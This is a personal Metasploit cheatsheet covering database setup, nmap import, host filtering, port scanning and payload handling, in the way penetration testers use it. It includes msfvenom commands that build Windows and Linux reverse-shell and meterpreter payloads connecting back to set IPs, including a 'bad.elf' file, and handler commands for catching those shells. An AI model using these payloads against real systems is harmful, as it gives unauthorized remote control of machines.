Metasploit cheatsheet
In this page, you will find notes that I have made for Metasploit.
Database and Report Management: The commands involving xsltproc, hosts, services, and db_connect are used for managing databases and reports in Metasploit. These commands help in converting scan reports, filtering data, displaying specific service details, and connecting to databases.
Payload Generation: Commands like
msfvenomare used to create payloads for different platforms (Windows, Linux) which can be used for reverse shell purposes. This enables penetration testers to maintain connections with compromised machines.Exploitation and Handlers: Commands such as
use exploitandset PAYLOADare used for loading specific exploits and setting up payload handlers. These handlers listen for incoming connections from the target, allowing the tester to control the affected machine.Auxiliary and Modules Loading: Commands like
use auxiliary/scannerand reloading exploits highlight the ability to perform tasks like port scanning and exploiting vulnerabilities by loading and reloading necessary modules in Metasploit.
Metasploit database
To create a database in Metasploit:
sudo service postgresql start
sudo msfdb init
sudo msfconsole
Db_status
msfconsole
workspace -h
workspace -a Useful database commands in Metasploit
Db_export -f xml database.xml
Db_import PATH/NMAP.xml
Db_connect
Db_import
Db_status
Db_nmap
Db_stats
//displays the hosts db column options
hosts -h
//filter on hosts column and show only selected fields
hosts -c address, os_flavor
Display mentioned columns and filter on Linux
Hosts -c address, os_flavor -S Linux Nmap inside Metasploit database
db_nmap -sP -sS and -sV and -A [IP] Copy a new rubby exploit to Metasploit
Cp exploit.rb usr/share/metasploit-framework/modules/exploits/multi/http
Msfconsole==>Reload_all Post exploitation Metasploit commands
// Some codeXSLT Processing for Nmap Reports: Convert XML scan results to HTML to enhance readability using browsers.
xsltproc -o ~/scanresults.html /usr/share/nmap/nmap.xsl scan.xmlMetasploit Database Management: Utilize useful database commands for handling Metasploit databases. Customize your queries by selecting specific columns and applying filters.
hosts -c address, os_flavor -S Linux
services -c name,info -S httpPort Scanning and Service Enumeration: Use the auxiliary scanner to perform TCP port scans and filter out relevant services, such as HTTP.
use auxiliary/scanner/portscan/tcpPayload Generation with msfvenom: Create payloads for Windows, including reverse shells and meterpreter shells.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.17 LPORT=443 -f c -a x86 --platform windows -b \x00Launching Exploits and Handlers: Quickly set up and execute handlers and exploits in Metasploit using concise commands.
msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST <LocalIp>; set LPORT 4444; exploit"Start handler to receive a reverse shell:
use exploit/multi/handler set PAYLOAD linux/x64/meterpreter/reverse_tcp set LHOST 10.1.1.96 set LPORT 443 run
Create bad elf file that connects back to us:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.1.1.96 LPORT=443 -f elf -o bad.elf Database Connection in Metasploit: Connect to a specific Metasploit database using configuration files or direct connection strings.
msf > db_connect -y /opt/metasploit/config/database.yml
msf > db_connect your_msfdb_user:your_msfdb_pswd@127.0.0.1:5432/msf_database Troubleshooting Database Issues: Resolve common database connection problems in Metasploit by ensuring necessary drivers are installed and reconfiguring as needed.
sudo apt-get install libpq-dev
sudo msfconsole --quiet -x "db_status; exit;"